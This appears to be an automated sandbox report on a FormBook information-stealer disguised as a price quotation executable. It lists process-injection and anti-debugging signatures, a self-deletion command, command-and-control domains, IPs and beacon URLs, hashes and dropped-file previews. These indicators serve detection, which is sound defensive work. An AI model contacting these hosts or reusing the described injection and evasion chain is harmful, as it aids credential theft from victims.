Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D1131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C54F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8E730 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Code function: 3_2_00409B50 LdrLoadDll,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe	Network Connect: 154.208.173.139 80
Source: C:\Windows\explorer.exe	Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe	Network Connect: 109.106.246.165 80
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe	Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe	Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe	Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe	Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe	Domain query: www.patrickandmaxine.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1060000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Memory written: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3472

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Process created: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe'

Source: explorer.exe, 00000006.00000000.281211852.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000000.311360069.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.296289053.0000000001640000.00000002.00020000.sdmp, wscript.exe, 00000011.00000002.522434633.00000000034E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Virtualization/Sandbox Evasion2	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection612	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PRICE_REQUEST_QUOTATION.exe	34%	Virustotal		Browse
PRICE_REQUEST_QUOTATION.exe	29%	ReversingLabs	Win32.Trojan.Nsisx
PRICE_REQUEST_QUOTATION.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll	13%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
17.2.wscript.exe.c28870.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
17.2.wscript.exe.516796c.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
0.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

Source	Detection	Scanner	Label	Link
nailsestetic.space	2%	Virustotal		Browse
www.futurodr.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc	100%	Avira URL Cloud	malware
http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
www.nudesalon.digital/rgoe/	0%	Avira URL Cloud	safe
http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe
http://survey-smiles.com	0%	Avira URL Cloud	safe
http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nailsestetic.space	109.106.246.165	true	true	2%, Virustotal, Browse	unknown
www.futurodr.com	154.208.173.139	true	true	0%, Virustotal, Browse	unknown
www.babeshotnud.com	185.107.56.60	true	true		unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false		unknown
parkingpage.namecheap.com	198.54.117.212	true	false		high
teelandcompany.com	34.102.136.180	true	false		unknown
www.thenewtocsin.com	unknown	unknown	true		unknown
www.4-6-2.com	unknown	unknown	true		unknown
www.snackithalal.com	unknown	unknown	true		unknown
www.nailsestetic.space	unknown	unknown	true		unknown
www.appleluis.host	unknown	unknown	true		unknown
www.teelandcompany.com	unknown	unknown	true		unknown
www.patrickandmaxine.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: malware	unknown
http://www.futurodr.com/rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: safe	unknown
http://www.babeshotnud.com/rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc	true	Avira URL Cloud: safe	unknown
www.nudesalon.digital/rgoe/	true	Avira URL Cloud: safe	low
http://www.patrickandmaxine.com/rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc	false	Avira URL Cloud: safe	unknown
http://www.teelandcompany.com/rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	PRICE_REQUEST_QUOTATION.exe	false		high
https://bitninja.io	wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	PRICE_REQUEST_QUOTATION.exe	false		high
http://survey-smiles.com	wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
154.208.173.139	www.futurodr.com	Seychelles	40065	CNSERVERSUS	true
185.107.56.60	www.babeshotnud.com	Netherlands	43350	NFORCENL	true
34.102.136.180	teelandcompany.com	United States	15169	GOOGLEUS	false
109.106.246.165	nailsestetic.space	Serbia	199493	NETNET-ASRS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491948
Start date:	28.09.2021
Start time:	08:02:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	PRICE_REQUEST_QUOTATION.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/2@9/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 25.1% (good quality ratio 15.9%) Quality average: 51.6% Quality standard deviation: 43%
HCA Information:	Successful, ratio: 83% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.209.183, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.107.56.60	gRd8HGFpL7.exe	Get hash	malicious	Browse	www.pxwuo.com/kgw/?8pBp5p=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN0BUW6oeKdMTmJKWlw==&LXPL=yvqlQXkhnxmxPrbP
	5j6RsnL8zx.exe	Get hash	malicious	Browse	www.tomatrader.com/8rg4/?Txlp=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&OHX=JRmh
	QUOTE110.exe	Get hash	malicious	Browse	www.coolestpornreviews.com/vcd/?YVMtapH=LyDxHldb+KlOSDua8YCOPwjDVdjcS2dbW4Dz7bHlFL8lQur/HOk9HtLfSHz2pyKhCdo+&BB=Lzr4TtmpAHX4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	Payment Slip.exe	Get hash	malicious	Browse	198.54.117.211
	RFQ9003930 New Order.doc	Get hash	malicious	Browse	198.54.117.215
	PURCHASE ORDER I 5083.exe	Get hash	malicious	Browse	198.54.117.218
	RgproFrlyA.exe	Get hash	malicious	Browse	198.54.117.218
	INVOICE.exe	Get hash	malicious	Browse	198.54.117.211
	NEW ORDER RE PO88224.PDF.EXE	Get hash	malicious	Browse	198.54.117.212
	doc0490192021092110294.exe	Get hash	malicious	Browse	198.54.117.211
	SWIFT Transfer 103_0034OTT21000123_8238174530.PDF.exe	Get hash	malicious	Browse	198.54.117.210
	SYsObQNkC1.exe	Get hash	malicious	Browse	198.54.117.216
	SBGW#001232021.exe	Get hash	malicious	Browse	198.54.117.217
	DHL_Sender_Documents_Details_021230900.xlsx	Get hash	malicious	Browse	198.54.117.215
	invoice.exe	Get hash	malicious	Browse	198.54.117.210
	onxyPs4yG1MUPbN.exe	Get hash	malicious	Browse	198.54.117.211
	85fX3YfW9S.exe	Get hash	malicious	Browse	198.54.117.215
	Amended SO of 2000KVA400KVA.exe	Get hash	malicious	Browse	198.54.117.210
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	198.54.117.217
	Z14S9Zolcyub1pd.exe	Get hash	malicious	Browse	198.54.117.210
	sprogr.exe	Get hash	malicious	Browse	198.54.117.215
	EWVNnyXoRS.exe	Get hash	malicious	Browse	198.54.117.212
	aT8aer3ybNvYpl3.exe	Get hash	malicious	Browse	198.54.117.215

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNSERVERSUS	SUPPLY_PRICE_ORDER_9978484DF.exe	Get hash	malicious	Browse	23.225.139.107
	8LdKQIRfZG	Get hash	malicious	Browse	41.216.185.141
	vHLDOsbYKA	Get hash	malicious	Browse	41.216.185.113
	LAKmNB72J8	Get hash	malicious	Browse	156.255.31.131
	xUAaxUb8FS	Get hash	malicious	Browse	23.225.119.147
	17Rom1F3MY	Get hash	malicious	Browse	156.251.245.93
	DHL_Sender_Documents_Details_021230900.xlsx	Get hash	malicious	Browse	154.208.173.230
	invoice.exe	Get hash	malicious	Browse	172.247.0.173
	#U9488#U5bf9#U57ab#U4ed8#U517c#U804c#U5f00#U5355#U5341#U4e2a#U79d8#U8bc0.exe	Get hash	malicious	Browse	172.247.15.222
	invoice attachment.docm	Get hash	malicious	Browse	172.83.155.147
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	154.210.71.233
	Quotation & Sample Designs.PDF.exe	Get hash	malicious	Browse	154.210.71.233
	cJHhmOyf4o.exe	Get hash	malicious	Browse	154.208.173.151
	MFtBYsz3kB.exe	Get hash	malicious	Browse	154.210.74.237
	EIElnDxX0V.exe	Get hash	malicious	Browse	154.208.173.230
	77dsREO8Me.exe	Get hash	malicious	Browse	23.225.30.174
	TsHIdFKafF	Get hash	malicious	Browse	23.224.58.165
	Wire transfer.exe	Get hash	malicious	Browse	103.61.30.44
	Vrd8Yqy7kn.exe	Get hash	malicious	Browse	172.83.155.173
	fk8YZet4QU	Get hash	malicious	Browse	156.251.171.249

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4gyujazywsbdaoe Download File
Process:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
File Type:	data
Category:	dropped
Size (bytes):	216882
Entropy (8bit):	7.993293156280056
Encrypted:	true
SSDEEP:	6144:71sLVyecy+1K1bqg5pcPtdi+wSagdVBFJ6uQgVd0kI:71DdIqg5pcji+a6VLJ6vP
MD5:	F3364C6B2D2FBE79DF14059B0A45B326
SHA1:	2102737F5438F054621A71528044F38FF9CB82BC
SHA-256:	CA7D46A32EC12479AFEEC23562BD199C91D2DC0912462250D1A3811A7E89BE83
SHA-512:	A43EBC1C5975D7A44E9901EED45EADC53B7427FCF7C13A725BE782A972728AF038C92AE0CC954AE705C3EA93F2EB3A37208CD9FB6237B7F5B6899275AA211A27
Malicious:	false
Reputation:	low
Preview:	rV.RW.%......8.Y...Q.y.....k..+.k......D.n..0...u.h..s.t...\...).U...w...F;....?.g.......e@.(.=...\|.B...K..U'.....m...#U>K:\......~.t.G`N9Gz.......Is.....[.r.E./m/."..[Y....?.#UI=s..o...q.......i..>q...........Q....U1:Sn.ye.,.d.od...T..K`.%..%..@..e..@.R._......O.f..+........D.nl.0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]......[Y..\.]&.#...P..o...q..<^]..i.=[9........4h.Q......:Sn.ye.,.d@od..0T..K5.f..%.......@.R....'..O...+.k......D.n..0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]/."..[Y....]l.#.RoP..o...q..<^]..i.=[q........4h.Q......:Sn.ye.,.d@od..0T..K5.f..%.......@.R....'..O...+.k......D.n..0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]/."..[Y....]l.#.RoP..o...q..<^]..i.=[q........4h.Q...

C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll Download File
Process:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	6.182711541286411
Encrypted:	false
SSDEEP:	768:1Zi08T7N8+MHPofNnsG7NthUO33gg5Yyn91tMyuuVaRCNLBk0e67y9OLuiSuMwGA:/8T7N8CnhV/1e67y9O9IKoSJCPQRAli3
MD5:	0560BA80E8AFE7F5D83EB600602AB426
SHA1:	A783F03BC76EE70833D61D69D854674F45D5A223
SHA-256:	19013D7428A659774231FD4B5213A463EEAB58A0C347DADFAA95536BD89D3F13
SHA-512:	A034974DC569DB8064B9BC5699E33B188C581E716862FED95708A1B2CAACCAA6AE8EE4F4F23989C68EF838EA71271423501B6AEA27A9C216AF9DB9745356B12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sE..7$.C7$.C7$.CDF.B6$.CDF.B8$.C7$.C.$.CaQ.B6$.CaQ.B6$.CaQ.C6$.CaQ.B6$.CRich7$.C................PE..L....QRa...........!.....j...N............................................................@.............................H...D.......................................................................................................................text...ah.......j.................. ..`.bss.....................................rdata...............n..............@..@.data....4.......6...\|..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.911190489576227
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PRICE_REQUEST_QUOTATION.exe
File size:	267109
MD5:	85589170af713a03ca622f94429c634a
SHA1:	4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256:	dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
SHA512:	1379d1dbed880c664d7314018e676970afd192a423e6144f3bac6b15e5f89fb4bc245adbe462046ccfb6692e0054be18b459bc2757e60d700c03758232682dd9
SSDEEP:	6144:F8LxBsicGu14h0W/c8aRyPwSagdVDgfpnYluQgVd0ka7cDp3:/USWDaRaa6VUBqvr03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40312a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F3494B986C3h
push ebx
